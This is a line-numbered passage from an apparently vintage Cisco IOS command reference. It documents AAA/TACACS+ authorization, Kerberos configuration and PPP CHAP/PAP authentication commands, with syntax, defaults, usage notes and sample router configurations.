7026(for example: callback-rotary=34). Used with service=arap, service=slip, service=ppp,
7027service=shell. Not valid for ISDN. no yes yes
7028nocallback-verify Indicates that no callback verification is required. The only valid value for
7029this parameter is 1 (for example, nocallback-verify=1). Used with service=arap, service=slip,
7030service=ppp, service=shell. There is no authentication on callback. Not valid for ISDN. no
7031 yes yes
7032tunnel-id Specifies the username that will be used to authenticate the tunnel over which
7033the individual user MID will be projected. This is analogous to the remote name in the vpdn
7034outgoing command. Used with service=ppp and protocol=vpdn. no no yes
7035ip-addresses Space-separated list of possible IP addresses that can be used for the end-point
7036of a tunnel. Used with service=ppp and protocol=vpdn. no no yes
7037nas-password Specifies the password for the network access server during the L2F tunnel
7038authentication. Used with service=ppp and protocol=vpdn. no no yes
7039gw-password Specifies the password for the home gateway during the L2F tunnel
7040authentication. Used with service=ppp and protocol=vpdn. no no yes
7041rte-ftr-in#<n> Specifies an input access list definition to be installed and applied to routing
7042updates on the current interface for the duration of the current connection. Used with service=ppp
7043and protocol=ip, and with service=ppp and protocol=ipx. no no 11.2(4)F
7044rte-ftr-out#<n> Specifies an output access list definition to be installed and applied to routing
7045updates on the current interface for the duration of the current connection. Used with service=ppp
7046and protocol=ip, and with service=ppp and protocol=ipx. no no yes 11.2(4)F
7047sap#<n> Specifies static Service Advertising Protocol (SAP) entries to be installed for the
7048duration of a connection. Used with service=ppp and protocol=ipx. no no yes
704911.2(4)F
7050sap-fltr-in#<n> Specifies an input SAP filter access list definition to be installed and applied on
7051the current interface for the duration of the current connection. Used with service=ppp and
7052protocol=ipx. no no yes 11.2(4)F
7053sap-fltr-out#<n> Specifies an output SAP filter access list definition to be installed and
7054applied on the current interface for the duration of the current connection. Used with service=ppp
7055and protocol=ipx. no no 11.2(4)F
7056pool-def#<n> Used to define IP address pools on the network access server. Used with
7057service=ppp and protocol=ip. no no 11.2(4)F
7058source-ip=x Used as the source IP address of all VPDN packets generated as part of a VPDN
7059tunnel. This is equivalent to the Cisco vpdn outgoing global configuration command. no
7060 no yes
7061Examples
7062The following example specifies that TACACS+ authorization is used for all network-related
7063requests. If this authorization method returns an error (if the TACACS+ server cannot be
7064contacted), no authorization is performed and the request succeeds.
7065aaa authorization network tacacs+ none
7066
7067The following example specifies that TACACS+ authorization is run for level 15 commands. If this
7068authorization method returns an error (that is, if the TACACS+ server cannot be contacted), no
7069authorization is performed and the request succeeds.
7070aaa authorization command 15 tacacs+ none
7071Related Commands
7072A dagger (†) indicates that the command is documented outside this chapter.
7073aaa accounting â€
7074aaa new-model
7075
7076[12.3.2] aaa authorization config-commands
7077To disable AAA configuration command authorization in the EXEC mode, use the no form of the
7078aaa authorization config-commands global configuration command. Use the standard form of
7079this command to reestablish the default created when the aaa authorization command level
7080method command was issued.
7081aaa authorization config-commands
7082no aaa authorization config-commands
7083Syntax Description
7084This command has no arguments or keywords.
7085Default
7086After the aaa authorization command level method has been issued, this command is enabled
7087by default---meaning that all configuration commands in the EXEC mode will be authorized.
7088Command Mode
7089Global configuration
7090Usage Guidelines
7091This command first appeared in Cisco IOS Release 11.2.
7092If aaa authorization command level method is enabled, all commands, including configuration
7093commands, are authorized by AAA using the method specified. Because there are configuration
7094commands that are identical to some EXEC-level commands, there can be some confusion in the
7095authorization process. Using no aaa authorization config-commands stops the network access
7096server not from attempting configuration command authorization.
7097Once the no form of this command has been issued, AAA authorization of configuration
7098commands is completely disabled. Care should be taken before issuing the no form of this
7099command because it potentially reduces the amount of administrative control on configuration
7100commands.
7101Use the aaa authorization config-commands command if, after using the no form of this
7102command, you need to reestablish the default set by the aaa authorization command level
7103method command.
7104Example
7105The following example specifies that TACACS+ authorization is run for level 15 commands and
7106that AAA authorization of configuration commands is disabled:
7107aaa new-model
7108aaa authorization command 15 tacacs+ none
7109no aaa authorization config-commands
7110Related Commands
7111aaa authorization
7112
7113[12.3.3] aaa new-model
7114To enable the AAA access control model, issue the aaa new-model global configuration
7115command. Use the no form of this command to disable this functionality.
7116aaa new-model
7117no aaa new-model
7118Syntax Description
7119This command has no arguments or keywords.
7120Default
7121AAA is not enabled.
7122Command Mode
7123Global configuration
7124Usage Guidelines
7125This command first appeared in Cisco IOS Release 10.0.
7126This command enables the AAA access control system and TACACS+. If you initialize AAA
7127functionality and later decide to use TACACS or extended TACACS, issue the no version of this
7128command before you enable the version of TACACS that you want to use.
7129After enabling AAA/TACACS+ with the aaa new-model command, you must use the tacacs-
7130server key command to set the authentication key used in all TACACS+ communications with
7131the TACACS+ daemon.
7132Example
7133The following example initializes AAA and TACACS+:
7134aaa new-model
7135Related Commands
7136A dagger (†) indicates that the command is documented outside this chapter.
7137aaa accounting â€
7138aaa authentication arap
7139aaa authentication enable default
7140aaa authentication local-override
7141aaa authentication login
7142aaa authentication ppp
7143aaa authorization
7144tacacs-server key
7145
7146[12.3.4] arap authentication
7147To enable AAA authentication for ARA on a line, use the arap authentication line configuration
7148command. Use the no form of the command to disable authentication for an ARA line.
7149arap authentication {default | list-name}
7150no arap authentication {default | list-name}
7151
7152Caution If you use a list-name value that was not configured with the aaa authentication arap
7153command, ARA protocol will be disabled on this line.
7154Syntax Description
7155default Default list created with the aaa authentication arap command.
7156list-name Indicated list created with the aaa authentication arap command.
7157Default
7158ARA protocol authentication uses the default set with aaa authentication arap command. If no
7159default is set, the local user database is checked.
7160Command Mode
7161Line configuration
7162Usage Guidelines
7163This command first appeared in Cisco IOS Release 11.0.
7164This command is a per-line command that specifies the name of a list of AAA authentication
7165methods to try at login. If no list is specified, the default list is used (whether or not it is specified
7166in the command line). You create defaults and lists with the aaa authentication arap command.
7167Entering the no version of arap authentication has the same effect as entering the command
7168with the default argument.
7169Before issuing this command, create a list of authentication processes by using the aaa
7170authentication arap global configuration command.
7171Example
7172The following example specifies that the TACACS+ authentication list called MIS-access is used
7173on ARA line 7:
7174line 7
7175arap authentication MIS-access
7176Related Command
7177aaa authentication arap
7178
7179[12.3.5] clear kerberos creds
7180Use the clear kerberos creds EXEC command to delete the contents of your credentials cache.
7181clear kerberos creds
7182Syntax Description
7183This command has no keywords or arguments.
7184Command Mode
7185EXEC
7186Usage Guidelines
7187This command first appeared in Cisco IOS Release 11.1.
7188Credentials are cleared when the user logs out.
7189Cisco supports Kerberos 5.
7190Example
7191The following example illustrates the clear kerberos creds command:
7192cisco-2500> show kerberos creds
7193Default Principal: chet@cisco.com
7194Valid Starting Expires Service Principal
719518-Dec-1995 16:21:07 19-Dec-1995 00:22:24 krbtgt/CISCO.COM@CISCO.COM
7196
7197cisco-2500> clear kerberos creds
7198cisco-2500> show kerberos creds
7199No Kerberos credentials.
7200
7201cisco-2500>
7202Related Command
7203show kerberos creds
7204
7205[12.3.6] enable last-resort
7206To specify what happens if the TACACS and extended TACACS servers used by the enable
7207command do not respond, use the enable last-resort global configuration command. Use the no
7208form of this command to restore the default.
7209enable last-resort {password | succeed}
7210no enable last-resort {password | succeed}
7211Syntax Description
7212password Allows you to enter enable mode by entering the privileged command level
7213password. A password must contain from 1 to 25 uppercase and lowercase alphanumeric
7214characters.
7215succeed Allows you to enter enable mode without further question.
7216Default
7217Access to enable mode is denied.
7218Command Mode
7219Global configuration
7220Usage Guidelines
7221This command first appeared in Cisco IOS Release 10.0.
7222The secondary authentication is used only if the first attempt fails.
7223
7224Note This command is not used in AAA/TACACS+, which uses the aaa authentication suite of
7225commands instead.
7226
7227Example
7228In the following example, if the TACACS servers do not respond to the enable command, the
7229user can enable by entering the privileged level password:
7230enable last-resort password
7231Related Command
7232A dagger (†) indicates that the command is documented outside this chapter.
7233enable â€
7234
7235
7236[12.3.7] enable use-tacacs
7237To enable use of the TACACS to determine whether a user can access the privileged command
7238level, use the enable use-tacacs global configuration command. Use the no form of this
7239command to disable TACACS verification.
7240enable use-tacacs
7241no enable use-tacacs
7242
7243Caution If you use the enable use-tacacs command, you must also use the tacacs-server
7244authenticate enable command, or you will be locked out of the privileged command level.
7245Syntax Description
7246This command has no arguments or keywords.
7247Default
7248Disabled
7249Command Mode
7250Global configuration
7251Usage Guidelines
7252This command first appeared in Cisco IOS Release 10.0.
7253When you add this command to the configuration file, the EXEC enable command prompts for a
7254new username and password pair. This pair is then passed to the TACACS server for
7255authentication. If you are using extended TACACS, it also passes any existing UNIX user
7256identification code to the server.
7257
7258Note This command initializes TACACS. Use the tacacs server-extended command to initialize
7259extended TACACS, or use the aaa new-model command to initialize AAA/TACACS+.
7260
7261Example
7262The following example sets TACACS verification on the privileged EXEC-level login sequence:
7263enable use-tacacs
7264tacacs-server authenticate enable
7265Related Command
7266A dagger (†) indicates that the command is documented outside this chapter.
7267tacacs-server authenticate enable â€
7268
7269
7270[12.3.8] ip radius source-interface
7271Use the ip radius source-interface global configuration command to force RADIUS to use the IP
7272address of a specified interface for all outgoing RADIUS packets. Use the no form of this
7273command to disable use of a specified interface IP address.
7274ip radius source-interface subinterface-name
7275no ip radius source-interface
7276Syntax Description
7277subinterface-name Name of the interface that RADIUS uses for all of its outgoing packets.
7278Default
7279This command has no factory-assigned default.
7280Command Mode
7281Global configuration
7282Usage Guidelines
7283This command first appeared in Cisco IOS Release 11.1.
7284Use this command to set a subinterface's IP address to be used as the source address for all
7285outgoing RADIUS packets. This address is used as long as the interface is in the up state. In this
7286way, the RADIUS server can use one IP address entry for every network access client instead of
7287maintaining a list of IP addresses.
7288This command is especially useful in cases where the router has many interfaces, and you want
7289to ensure that all RADIUS packets from a particular router have the same IP address.
7290The specified interface must have an IP address associated with it. If the specified subinterface
7291does not have an IP address or is in a down state, then RADIUS reverts to the default. To avoid
7292this, add an IP address to the subinterface or bring the interface to the up state.
7293Example
7294The following example makes RADIUS use the IP address of subinterface s2 for all outgoing
7295RADIUS packets:
7296ip radius source-interface s2
7297Related Commands
7298A dagger (†) indicates that the command is documented outside this chapter.
7299ip tacacs source-interface â€
7300ip telnet source-interface â€
7301ip tftp source-interface â€
7302
7303[12.3.9] ip tacacs source-interface
7304Use the ip tacacs source-interface global configuration command to force TACACS to use the
7305IP address of a specified interface for all outgoing TACACS packets. Use the no form of this
7306command to disable use of a specified interface IP address.
7307ip tacacs source-interface subinterface-name
7308no ip tacacs source-interface
7309Syntax Description
7310subinterface-name Name of the interface that TACACS uses for all of its outgoing packets.
7311Default
7312This command has no factory-assigned default.
7313Command Mode
7314Global configuration
7315Usage Guidelines
7316This command first appeared in Cisco IOS Release 11.1.
7317Use this command to set a subinterface's IP address for all outgoing TACACS packets. This
7318address is used as long as the interface is in the up state. In this way, the TACACS server can
7319use one IP address entry associated with the network access client instead of maintaining a list of
7320all IP addresses.
7321This command is especially useful in cases where the router has many interfaces, and you want
7322to ensure that all TACACS packets from a particular router have the same IP address.
7323The specified interface must have an IP address associated with it. If the specified subinterface
7324does not have an IP address or is in a down state, TACACS reverts to the default. To avoid this,
7325add an IP address to the subinterface or bring the interface to the up state.
7326Example
7327The following example makes TACACS use the IP address of subinterface s2 for all outgoing
7328TACACS (TACACS, extended TACACS, or TACACS+) packets:
7329ip tacacs source-interface s2
7330Related Commands
7331A dagger (†) indicates that the command is documented outside this chapter.
7332ip radius source-interface â€
7333ip telnet source-interface â€
7334ip tftp source-interface â€
7335
7336[12.4.0] kerberos clients mandatory
7337Use the kerberos clients mandatory global configuration command to cause the rsh, rcp,
7338rlogin, and telnet commands to fail if they cannot negotiate the Kerberos protocol with the
7339remote server. Use the no form of this command to disable this option.
7340kerberos clients mandatory
7341no kerberos clients mandatory
7342Syntax Desctiption
7343This command has no arguments or keywords.
7344Default
7345Disabled
7346Command Mode
7347Global configuration
7348User Guidelines
7349This command first appeared in Cisco IOS Release 11.2.
7350If this command is not configured and the user has Kerberos credentials stored locally, the rsh,
7351rcp, rlogin, and telnet commands attempt to negotiate the Kerberos protocol with the remote
7352server and will use the un-Kerberized protocols if unsuccessful.
7353If this command is not configured and the user has no Kerberos credentials, the standard
7354protocols for rcp and rsh are used to negotiate the Keberos protocol.
7355Example
7356The following example illustrates the kerberos clients mandatory command:
7357kerberos clients mandatory
7358Related Commands
7359A dagger (†) indicates that this command is documented outside this chapter.
7360copy rcp â€
7361kerberos credentials forward
7362rlogin â€
7363rsh â€
7364telnet â€
7365
7366[12.4.1] kerberos credentials forward
7367Use the kerberos credentials forward global configuration command to force all network
7368application clients on the router to forward users' Kerberos credentials upon successful Kerberos
7369authentication. Use the no form of this command to turn off Kerberos credentials forwarding.
7370kerberos credentials forward
7371no kerberos credentials forward
7372Syntax Description
7373This command has no arguments or keywords.
7374Default
7375Disabled
7376Command Mode
7377Global configuration
7378Usage Guidelines
7379This command first appeared in Cisco IOS Release 11.2.
7380Enable credentials forwarding to have users' TGTs forwarded to the host they authenticate to. In
7381this way, users can connect to multiple hosts in the Kerberos realm without running the KINIT
7382program each time they need to get a TGT.
7383Example
7384The following example illustrates the kerberos credentials forward command:
7385kerberos credentials forward
7386Related Commands
7387A dagger (†) indicates that the command is documented outside this chapter.
7388copy rcp â€
7389rlogin â€
7390rsh â€
7391telnet â€
7392
7393[12.4.2] kerberos instance map
7394Use the kerberos instance map global configuration command to map Kerberos instances to
7395Cisco IOS privilege levels. Use the no form of this command to remove a Kerberos instance map.
7396kerberos instance map instance privilege-level
7397no kerberos instance map instance
7398Syntax Description
7399instance Name of a Kerberos instance.
7400privilege-level The privilege level at which a user is set if the user's Kerberos principle contains
7401the matching Kerberos instance. You can specify up to 16 privilege levels, using numbers 0
7402through 15. Level 1 is normal EXEC-mode user privileges.
7403Default
7404Privilege level 1
7405Command Mode
7406Global configuration
7407Usage Guidelines
7408This command first appeared in Cisco IOS Release 11.2.
7409Use this command to create user instances with access to administrative commands.
7410Example
7411In the following example, the privilege level is set to 15 for authenticated Kerberos users with the
7412admin instance in Kerberos realm cisco.com:
7413kerberos instance map admin 15
7414Related Command
7415aaa authorization
7416
7417[12.4.3] kerberos local-realm
7418Use the kerberos local-realm global configuration command to specify the Kerberos realm in
7419which the router is located. Use the no form of this command to remove the specified Kerberos
7420realm from this router.
7421kerberos local-realm kerberos-realm
7422no kerberos local-realm
7423Syntax Description
7424kerberos-realm The name of the default Kerberos realm. A Kerberos realm consists of users,
7425hosts, and network services that are registered to a Kerberos server. The Kerberos realm must
7426be in uppercase letters.
7427Default
7428Disabled
7429Command Mode
7430Global configuration
7431Usage Guidelines
7432This command first appeared in Cisco IOS Release 11.1.
7433The router can be located in more than one realm at a time. However, there can only be one
7434instance of Kerberos local-realm. The realm specified with this command is the default realm.
7435Example
7436The following example illustrates the kerberos local realm command:
7437kerberos local-realm MURUGA.COM
7438Related Commands
7439kerberos preauth
7440kerberos realm
7441kerberos server
7442kerberos srvtab entry
7443kerberos srvtab remote
7444
7445[12.4.4] kerberos preauth
7446Use the kerberos preauth global configuration command to specify a preauthentication method
7447to use to communicate with the KDC. Use the no form of this command to disable Kerberos
7448preauthentication.
7449kerberos preauth [encrypted-unix-timestamp | none]
7450no kerberos preauth
7451Syntax Description
7452encrypted-unix-timestamp Use an encrypted UNIX timestamp as a quick authentication
7453method when communicating with the KDC.
7454none Do not use Kerberos preauthentication.
7455Default
7456Disabled
7457Command Mode
7458Global Configuration
7459Usage Guidelines
7460This command first appeared in Cisco IOS Release 11.2.
7461It is more secure to use a preauthentication for communications with the KDC. However,
7462communication with the KDC will fail if the KDC does not support this particular version of
7463kerberos preauth. If that happens, turn off the preauthentication with the none option.
7464The no form of this command is equivalent to using then none keyword.
7465Example
7466The following example illustrates how to enable and disable Kerberos preauthentication:
7467kerberos preauth encrypted-unix-timestamp
7468kerberos preauth none
7469Related Commands
7470kerberos local-realm
7471kerberos server
7472kerberos srvtab entry
7473kerberos srvtab remote
7474
7475[12.4.5] kerberos realm
7476Use the kerberos realm global configuration command to map a host name or Domain Naming
7477System (DNS) domain to a Kerberos realm. Use the no form of this command to remove a
7478Kerberos realm map.
7479kerberos realm {dns-domain | host} kerberos-realm
7480no kerberos realm {dns-domain | host} kerberos-realm
7481Syntax Description
7482dns-domain Name of a DNS domain or host.
7483host Name of a DNS host.
7484kerberos-realm Name of the Kerberos realm the specified domain or host belongs to.
7485Default
7486Disabled
7487Command Mode
7488Global configuration
7489Usage Guidelines
7490This command first appeared in Cisco IOS Release 11.1.
7491DNS domains are specified with a leading dot (.) character; hostnames cannot begin with a dot (.)
7492character. There can be multiple entries of this line.
7493A Kerberos realm consists of users, hosts, and network services that are registered to a Kerberos
7494server. The Kerberos realm must be in uppercase letters. The router can be located in more than
7495one realm at a time. Kerberos realm names must be in all uppercase characters.
7496Example
7497The following example illustrates the kerberos realm command:
7498kerberos realm .muruga.com MURUGA.COM
7499kerberos realm muruga.com MURUGA.COM
7500Related Commands
7501kerberos local-realm
7502kerberos server
7503kerberos srvtab entry
7504kerberos srvtab remote
7505
7506[12.4.6] kerberos server
7507Use the kerberos server global configuration command to specify the location of the Kerberos
7508server for a given Kerberos realm. Use the no form of this command to remove a Kerberos server
7509for a specified Kerberos realm.
7510kerberos server kerberos-realm {hostname | ip-address} [port-number]
7511no kerberos server kerberos-realm {hostname | ip-address}
7512Syntax Description
7513kerberos-realm Name of the Kerberos realm. A Kerberos realm consists of users, hosts, and
7514network services that are registered to a Kerberos server. The Kerberos realm must be in
7515uppercase letters.
7516hostname Name of the host functioning as a Kerberos server for the specified Kerberos
7517realm (translated into an IP address at the time of entry).
7518ip-address IP address of the host functioning as a Kerberos server for the specified
7519Kerberos realm.
7520port-number (Optional) Port that the KDC/TGS monitors (defaults to 88).
7521Default
7522Disabled
7523Command Mode
7524Global configuration
7525Usage Guidelines
7526This command first appeared in Cisco IOS Release 11.1.
7527Example
7528The following example specifies 126.38.47.66 as the Kerberos server for the Kerberos realm
7529MURUGA.COM:
7530kerberos server MURUGA.COM 126.38.47.66
7531Related Commands
7532kerberos local-realm
7533kerberos realm
7534kerberos srvtab entry
7535kerberos srvtab remote
7536
7537[12.4.7] kerberos srvtab entry
7538Use the kerberos srvtab remote global configuration command (not kerberos srvtab entry) to
7539retrieve a SRVTAB file from a remoe host and automatically generate a Kerberos SRVTAB entry
7540configuration. (The Kerberos SRVTAB entry is the router's locally stored SRVTAB.) Use the no
7541form of this command to remove a SRVTAB entry from the router's configuration.
7542kerberos srvtab entry kerberos-principle principle-type timestamp key-version number
7543key-type key-length encrypted-keytab
7544no kerberos srvtab entry kerberos-principle principle-type
7545Syntax Description
7546kerberos-principle A service on the router.
7547principle-type Version of the Kerberos SRVTAB.
7548timestamp Number representing the date and time the SRVTAB entry was created.
7549key-version number Version of the encryption key format.
7550key-type Type of encryption used.
7551key-length Length, in bytes, of the encryption key.
7552encrypted-keytab Secret key the router shares with the KDC. It is encrypted with the
7553private Data Encryption Standard (DES) key (if available) when you write out your configuration.
7554Command Mode
7555Global configuration.
7556Usage Guidelines
7557This command first appeared in Cisco IOS Release 11.2.
7558When you use the kerberos srvtab remote command to copy the SRVTAB file from a remote
7559host (generally the KDC), it parses the information in this file and stores it in the router's running
7560configuration in the kerberos srvtab entry format. The key for each SRVTAB entry is encrypted
7561with a private DES key if one is defined on the router. To ensure that the SRVTAB is available
7562(that is, that it does not need to be acquired from the KDC) when you reboot the router, use the
7563write memory router configuration command to write the router's running configuration to
7564NVRAM.
7565If you reload a configuration, with a SRVTAB encrypted with a private DES key, on to a router
7566that does not have a private DES key defined, the router displays a message informing you that
7567the SRVTAB entry has been corrupted, and discards the entry.
7568If you change the private DES key and reload an old version of the router's configuration that
7569contains SRVTAB entries encrypted with the old private DES keys, the router will restore your
7570Kerberos SRVTAB entries, but the SRVTAB keys will be corrupted. In this case, you must delete
7571your old Kerberos SRVTAB entries and reload your Kerberos SRVTABs on to the router using the
7572kerberos srvtab remote command.
7573Although you can configure kerberos srvtab entry on the router manually, generally you would
7574not do this because the keytab is encrypted automatically by the router when you copy the
7575SRVTAB using the kerberos srvtab remote command.
7576Example
7577In the following example, host/new-router.loki.com@LOKI.COM is the host, 0 is the type,
7578817680774 is the timestamp, 1 is the version of the key, 1 indicates the DES is the encryption
7579type, 8 is the number of bytes, and .cCN.YoU.okK is the encrypted key:
7580kerberos srvtab entry host/new-router.loki.com@LOKI.COM 0 817680774 1 1 8 .cCN.YoU.okK
7581Related Commands
7582kerberos srvtab remote
7583key config-key
7584
7585[12.4.8] kerberos srvtab remote
7586Use the kerberos srvtab remote configuration command to retrieve a krb5 SRVTAB file from the
7587specified host.
7588kerberos srvtab remote {hostname | ip-address} {filename}
7589Syntax Description
7590hostname Machine with the Kerberos SRVTAB file.
7591ip-address IP address of the machine with the Kerberos SRVTAB file.
7592filename Name of the SRVTAB file.
7593Command Mode
7594Configuration
7595Usage Guidelines
7596This command first appeared in Cisco IOS Release 11.2.
7597When you use the kerberos srvtab remote command to copy the SRVTAB file from the remote
7598host (generally the KDC), it parses the information in this file and stores it in the router's running
7599configuration in the kerberos srvtab entry format. The key for each SRVTAB entry is encrypted
7600with the private Data Encryption Standard (DES) key if one is defined on the router. To ensure
7601that the SRVTAB is available (that is, that it does not need to be acquired from the KDC) when
7602you reboot the router, use the write memory configuration command to write the router's running
7603configuration to NVRAM.
7604Example
7605The command in the following example copies the SRVTAB file residing on bucket.cisco.com to a
7606router named scooter.cisco.com:
7607kerberos srvtab remote bucket.cisco.com scooter.cisco.com-new-srvtab
7608Related Commands
7609kerberos srvtab entry
7610key config-key
7611
7612[12.4.9] key config-key
7613Use the key config-key global configuration command to define a private DES key for the router.
7614Use the no form of this command to delete a private Data Encryption Standard (DES) key for the
7615router.
7616key config-key 1 string
7617Syntax Description
7618string Private DES key (can be up to 8 alphanumeric characters).
7619Default
7620No DES-key defined.
7621Command Mode
7622Global configuration.
7623Usage Guidelines
7624This command first appeared in Cisco IOS Release 11.2.
7625This command defines for the router a private DES key that will not show up in the router
7626configuration. This private DES key can be used to DES-encrypt certain parts of the router's
7627configuration.
7628
7629Caution The private DES key is unrecoverable. If you encrypt part of your configuration with the
7630private DES key and lose or forget the key, you will not be able to recover the encrypted data.
7631Example
7632The command in the following example sets bubba as the private DES key on the router:
7633key config-key 1 bubba
7634Related Commands
7635kerberos srvtab entry
7636kerberos srvtab remote
7637
7638[12.5.0] login tacacs
7639To configure your router to use TACACS user authentication, use the login tacacs line
7640configuration command. Use the no form of this command to disable TACACS user
7641authentication for a line.
7642login tacacs
7643no login tacacs
7644Syntax Description
7645This command has no arguments or keywords.
7646Default
7647Disabled
7648Command Mode
7649Line configuration
7650Usage Guidelines
7651This command first appeared in Cisco IOS Release 10.0.
7652You can use TACACS security if you have configured a TACACS server and you have a
7653command control language (CCL) script that allows you to use TACACS security. For information
7654about using files provided by Cisco Systems to modify CCL scripts to support TACACS user
7655authentication, refer to the "Configuring AppleTalk Remote Access" chapter in the Access
7656Services Configuration Guide.
7657
7658Note This command cannot be used with AAA/TACACS+. Use the login authentication
7659command instead.
7660
7661Example
7662In the following example, lines 1 through 16 are configured for TACACS user authentication:
7663line 1 16
7664login tacacs
7665
7666[12.5.1] nasi authentication
7667To enable TACACS+ authentication for NetWare Asynchronous Services Interface (NASI) clients
7668connecting to a router, use the nasi authentication line configuration command. Use the no form
7669of the command to return to the default, as specified by the aaa authentication nasi command.
7670nasi authentication {default | list-name}
7671no login authentication {default | list-name}
7672Syntax Description
7673default Uses the default list created with the aaa authentication nasi command.
7674list-name Uses the list created with the aaa authentication nasi command.
7675Default
7676Uses the default set with the aaa authentication nasi command.
7677Command Mode
7678Line configuration
7679Usage Guidelines
7680This command first appeared in Cisco IOS Release 11.1.
7681This command is a per-line command used with AAA authentication that specifies the name of a
7682list of TACACS+ authentication methods to try at login. If no list is specified, the default list is
7683used, even if it is specified in the command line. (You create defaults and lists with the aaa
7684authentication nasi command.) Entering the no form of this command has the same effect as
7685entering the command with the default argument.
7686
7687Caution If you use a list-name value that was not configured with the aaa authentication nasi
7688command, you will disable login on this line.
7689Before issuing this command, create a list of authentication processes by using the aaa
7690authentication nasi global configuration command.
7691Examples
7692The following example specifies that the default AAA authentication be used on line 4:
7693line 4
7694nasi authentication default
7695The following example specifies that the AAA authentication list called list1 be used on line 7:
7696line 7
7697nasi authentication list1
7698Related Commands
7699A dagger (†) indicates that the command is documented outside this chapter.
7700aaa authentication nasi
7701ipx nasi-server enable â€
7702show ipx nasi connections â€
7703show ipx spx-protocol â€
7704
7705[12.5.2] ppp authentication
7706To enable Challenge Handshake Authentication Protocol (CHAP) or Password Authentication
7707Protocol (PAP) or both and to specify the order in which CHAP and PAP authentication are
7708selected on the interface, use the ppp authentication interface configuration command. Use the
7709no form of the command to disable this authentication.
7710ppp authentication {chap | chap pap | pap chap | pap } [if-needed] [list-name | default]
7711[callin]
7712no ppp authentication
7713Syntax Description
7714chap Enables CHAP on a serial interface.
7715pap Enables PAP on a serial interface.
7716chap pap Enables both CHAP and PAP, and performs CHAP authentication before PAP.
7717pap chap Enables both CHAP and PAP, and performs PAP authentication before CHAP.
7718if-needed (Optional) Used with TACACS and extended TACACS. Does not perform CHAP
7719or PAP authentication if the user has already provided authentication. This option is available only
7720on asychronous interfaces.
7721list-name (Optional) Used with AAA/TACACS+. Specifies the name of a list of TACACS+
7722methods of authentication to use. If no list name is specified, the system uses the default. The list
7723is created with the aaa authentication ppp command.
7724default The name of the method list is created with the aaa authentication ppp command.
7725callin Specifies authentication on incoming (received) calls only.
7726 Caution If you use a list-name value that was not configured with the aaa authentication
7727ppp command, you will disable PPP on this interface.
7728Default
7729PPP authentication is not enabled.
7730Command Mode
7731Interface configuration
7732Usage Guidelines
7733This command first appeared in Cisco IOS Release 10.0.
7734When you enable CHAP or PAP Authentication, or both, the local router requires the remote
7735device to prove its identity before allowing data traffic to flow. PAP Authentication requires the
7736remote device to send a name and password, which is checked against a matching entry in the
7737local username database or in the remote TACACS/TACACS+ database. CHAP Authentication
7738sends a Challenge to the remote device. The remote device encrypts the challenge value with a
7739shared secret and returns the encrypted value and its name to the local Router in a Response
7740message. The local router attempts to match the remote device's name with an associated secret
7741stored in the local username or remote TACACS/TACACS+ database; it uses the stored secret to
7742encrypt the original challenge and verify that the encrypted values match.
7743You can enable PAP or CHAP, or both, in either order. If you enable both methods, the first
7744method specified is requested during link negotiation. If the peer suggests using the second
7745method, or refuses the first method, the second method is tried. Some remote devices support
7746only CHAP, and some support only PAP. Base the order in which you specify methods on the
7747remote device's ability to correctly negotiate the appropriate method, and on the level of data line
7748security you require. PAP usernames and passwords are sent as cleartext strings, which can be
7749intercepted and reused. CHAP has eliminated most of the known security holes.
7750Enabling or disabling PPP authentication does not affect the local router's willingness to
7751authenticate itself to the remote device.
7752If you are using autoselect on a TTY line, you probably want to use the ppp authentication
7753command to turn on PPP authentication for the corresponding interface.
7754Example
7755The following example enables CHAP on asynchronous interface 4 and uses the authentication
7756list MIS-access:
7757interface async 4
7758
7759encapsulation ppp
7760
7761ppp authentication chap MIS-access
7762Related Commands
7763A dagger (†) indicates that the command is documented outside this chapter.
7764aaa authentication ppp
7765aaa new-model
7766autoselect â€
7767encapsulation ppp â€
7768ppp use-tacacs
7769username â€
7770
7771[12.5.3] ppp chap hostname
7772Use the ppp chap hostname interface configuration command to create a pool of dialup routers
7773that all appear to be the same host when authenticating with CHAP. To disable this function, use
7774the no form of the command.
7775ppp chap hostname hostname
7776no ppp chap hostname hostname
7777Syntax Description
7778hostname The name sent in the CHAP challenge.
7779Default
7780Disabled. The router name is sent in any CHAP challenges.
7781Command Mode
7782Interface configuration
7783Usage Guidelines
7784This command first appeared in Cisco IOS Release 11.2.
7785Currently, a router dialing a pool of access routers requires a username entry for each possible
7786router in the pool because each router challenges with its hostname. If a router is added to the
7787dialup rotary pool, all connecting routers must be updated. The ppp chap hostname command
7788allows you to specify a common alias for all routers in a rotary group to use so that only one
7789username must be configured on the dialing routers.
7790This command is normally used with local CHAP authentication (when the router authenticates to
7791the peer), but it can also be used for remote CHAP authentication.
7792Example
7793The commands in the following example identify the dialer interface 0 as the dialer rotary group
7794leader and specifies ppp as the method of encapsulation used by all member interfaces. CHAP
7795authentication is used on received calls only. The username ISPCorp will be sent in all CHAP
7796challenges and responses.
7797interface dialer 0
7798encapsulation ppp
7799ppp authentication chap callin
7800ppp chap hostnmae ISPCorp
7801Related Commands
7802aaa authentication ppp
7803ppp authentication
7804ppp chap password
7805ppp pap
7806
7807[12.5.4] ppp chap password
7808Use the ppp chap password interface configuration command to enable a router calling a
7809collection of routers that do not support this command (such as routers running older Cisco IOS
7810software images) to configure a common CHAP secret password to use in response to
7811challenges from an unknown peer. To disable this function, use the no form of this command.
7812ppp chap password secret
7813no chap password secret
7814Syntax Description
7815secret The secret used to compute the response value for any CHAP challenge from an
7816unknown peer.
7817Default
7818Disabled.
7819Command Mode
7820Interface configuration.
7821Usage Guidelines
7822This command first appeared in Cisco IOS Release 11.2.
7823This command allows you to replace several username and password configuration commands
7824with a single copy of this command on any dialer interface or asynchronous group interface.
7825This command is used for remote CHAP authentication only (when routers authenticate to the
7826peer) and does not affect local CHAP authentication.
7827Example
7828The commands in the following example specify Integrated Services Digital Network (ISDN) Basic
7829Rate Interface (BRI) number 0. The method of encapsulation on the interface is PPP. If a CHAP
7830challenge is received from a peer whose name is not found in the global list of usernames, the
7831encrypted secret 7 1267234591 is decrypted and used to create a CHAP response value.
7832interface bri 0
7833encapsulation ppp
7834ppp chap password 7 1234567891
7835Related Commands
7836aaa authentication ppp
7837ppp authentication
7838ppp chap hostname
7839ppp pap
7840
7841[12.5.5] ppp pap sent-username
7842To reenable remote PAP support for an interface and use the sent-username and password in
7843the PAP authentication request packet to the peer, use the ppp pap sent-username interface
7844configuration command. Use the no form of this command to disable remote PAP support.
7845ppp pap sent-username username password password
7846no ppp pap sent-username
7847Syntax Description
7848username Username sent in the PAP authentication request.
7849password Password sent in the PAP authentication request.
